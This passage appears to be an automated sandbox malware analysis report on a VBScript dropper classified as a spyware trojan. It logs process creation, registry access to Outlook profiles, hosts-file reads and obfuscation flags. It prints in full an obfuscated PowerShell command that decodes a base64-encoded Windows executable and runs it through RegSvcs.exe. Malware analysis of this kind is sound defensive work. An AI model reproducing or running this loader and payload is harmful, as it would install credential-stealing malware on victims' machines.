BS0lEQ0tIRcTDB44qf7//xEEewkAAAQWEQogADAAAB9AKBgAAAYTDRENLQZzJgAACnoRBHsJAAAEEQ0EEQsSASgWAAAGLQZzJgAACnoRBSD4AAAA1hMOHwk4W/7//wQRBRzWKCkAAAoX2hMRHwo4Rv7//xYTEh8LODz+//84nwAAAAQRDh8M1ignAAAKExMfDDgj/v//BBEOHxDWKCcAAAoTFB8NOA/+//8EEQ4fFNYoJwAAChMVHw44+/3//xEULEsRFBfaF9aNGwAAARMWHw844/3//wQRFREWFhEWjmkoKgAACh8QOM39//8RBHsJAAAEEQ0RE9YRFhEWjmkSASgWAAAGLQZzJgAACnoRDh8o1hMOHxE4nv3//xESF9YTEhESERE+WP///xENKCsAAAoTDx8SOH/9//8RBHsJAAAEEQge1hEPGhIBKBYAAAYtBnMmAAAKegQRBR8o1ignAAAKExAfEzhO/f//EQwsBBEGEw0RBx8sEQ0RENaeHxQ4Nf3//ygoAAAKGjMWEQR7CgAABBEHKBMAAAYtHHMmAAAKehEEewoAAAQRBygUAAAGLQZzJgAACnoRBHsKAAAEKBkAAAYVMwZzJgAACnreSCgsAAAKFisBFkUDAAAAAgAAABQAAAAkAAAAKyoRBHsLAAAEhCgtAAAKExcXK9sRFywHERdvLgAAChYKGCvLKC8AAAoZK8PeAhcKBioAAABBHAAAAAAAAFsAAABeAwAAuQMAAEgAAAAYAAABHgIoEgAACiobMAQA7QAAAAMAABFzMAAACiUoMQAACm8yAAAKAigzAAAKKDQAAApypQAAcHKxAABwbzUAAApytQAAcHLDAABwbzUAAApyxwAAcHLTAABwbzUAAApy1wAAcHLjAABwbzUAAApy5wAAcHL5AABwbzUAAApy/QAAcHIPAQBwbzUAAApyEwEAcHIlAQBwbzUAAApyK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ilbo13zy.j2f.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winVBS@6/3@3/3

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GJ890-1286.vbs"

Source: wscript.exe, 00000000.00000002.302919745.000001D52AC98000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ;.VBp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Shell");IWshShell3.Run("powershell.exe [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAA", "false")

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALAZ+mMAAAAAAAAAAOAAAiELAVAAACYAAAAGAAAAAAAAskQAAAAgAAAAYAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACgAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAGBEAABPAAAAAGAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAuCQAAAAgAAAAJgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAYAAAAAQAAAAoAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIAAAAACAAAALAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAACURAAAAAAAAEgAAAACAAUAxCgAAOQaAAADAAAAAAAAAKhDAAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKAEAAAoqHgIoAwAACiqmcwQAAAqAAQAABHMFAAAKgAIAAARzBgAACoADAAAEcwcAAAqABAAABCoufgEAAARvCAAACioufgIAAARvCQAACioufgMAAARvCgAACioufgQAAARvCwAACirWfgUAAAQUKBoAAAosAisGfgUAAAQqcgEAAHDQBQAAAigPAAAKbxsAAApzHAAACoAFAAAEK9oafgYAAAQqHgKABgAABCpWcwwAAAYoHQAACnQGAAACgAcAAAQqHgIoHgAACioafgcAAAQqGigNAAAGKh4CKBIAAAoqABMwBABAAAAAAQAAEXIhAABwCxYrARZFAgAAAAIAAAAYAAAAKx8XDAd+IAAACgIXKBsAAAYsBxcKFyvbKw0IF9YMGCvSCBsx3xYKBiobMAoABQQAAAIAABFylQAAcAIoIQAACgwWKwEWRQMAAAACAAAADQAAABgAAAArIRID/hUPAAACFyviEgT+FQ4AAAIYK9cSAxZ9GAAABBkrzBID0A8AAAIoDwAACigiAAAKuH0NAAAEAygjAAAKLQ0IcqEAAHADKCQAAAoMAgh+JQAACn4lAAAKFhp+JQAAChQSAxIEKBAAAAYtBnMmAAAKegQfPCgnAAAKEwUWKwEWRRQAAAAFAAAAFQAAACQAAAAzAAAAdAAAAMAAAADTAAAA8gAAAAIBAABQAQAAZQEAAG8BAACIAQAAnAEAALABAADIAQAA3gEAAA0CAAAsAgAAXQIAADhxAgAABBEFHzTWKCcAAAoTBhcrliCzAAAAjQkAAAETBxgrhxEHFiACAAEAnhk4eP///ygoAAAKGjMWEQR7CgAABBEHKBEAAAYtHHMmAAAKehEEewoAAAQRBygSAAAGLQZzJgAACnoRBx8plBMIGjg3////EQR7CQAABBEIHtYSCRoSASgVAAAGLQZzJgAACnoRBhEJMxYRBHsJAAAEEQkoFwAABiwGcyYAAAp6BBEFH1DWKCcAAAoTChs46/7//wQRBR9U1ignAAAKEwscONj+//8RBHsJAAAEEQYRCiAAMAAAH0AoGAAABhMNHTi5/v//BS0lEQ0tIRcTDB44qf7//xEEewkAAAQWEQogADAAAB9AKBgAAAYTDRENLQZzJgAACnoRBHsJAAAEEQ0EEQsSASgWAAAGLQZzJgAACnoRBSD4AAAA1hMOHwk4W/7//wQRBRzWKCkAAAoX2hMRHwo4Rv7//xYTEh8LODz+//84nwAAAAQRDh8M1ignAAAKExMfDDgj/v//BBEOHxDWKCcAAAoTFB8NOA/+//8EEQ4fFNYoJwAAChMVHw44+/3//xEULEsRFBfaF9aNGwAAARMWHw844/3//wQRFREWFhEWjmkoKgAACh8QOM39//8RBHsJAAAEEQ0RE9YRFhEWjmkSASgWAAAGLQZzJgAACnoRDh8o1hMOHxE4nv3//xESF9YTEhESERE+WP///xENKCsAAAoTDx8SOH/9//8RBHsJAAAEEQge1hEPGhIBKBYAAAYtBnMmAAAKegQRBR8o1ignAAAKExAfEzhO/f//EQwsBBEGEw0RBx8sEQ0RENaeHxQ4Nf3//ygoAAAKGjMWEQR7CgAABBEHKBMAAAYtHHMmAAAKehEEewoAAAQRBygUAAAGLQZzJgAACnoRBHsKAAAEKBkAAAYVMwZzJgAACnreSCgsAAAKFisBFkUDAAAAAgAAABQAAAAkAAAAKyoRBHsLAAAEhCgtAAAKExcXK9sRFywHERdvLgAAChYKGCvLKC8AAAoZK8PeAhcKBioAAABBHAAAAAAAAFsAAABeAwAAuQMAAEgAAAAYAAABHgIoEgAACiobMAQA7QAAAAMAABFzMAAACiUoMQAACm8yAAAKAigzAAAKKDQAAApypQAAcHKxAABwbzUAAApytQAAcHLDAABwbzUAAApyxwAAcHLTAABwbzUAAApy1wAAcHLjAABwbzUAAApy5wAAcHL5AABwbzUAAApy/QAAcHIPAQBwbzUAAApyEwEAcHIlAQBwbzUAAApyK
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05CFCF92 push esp; iretd	3_2_05CFD1CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05CFF588 pushad ; iretd	3_2_05CFF915
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05CFED90 pushad ; iretd	3_2_05CFEEBD

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
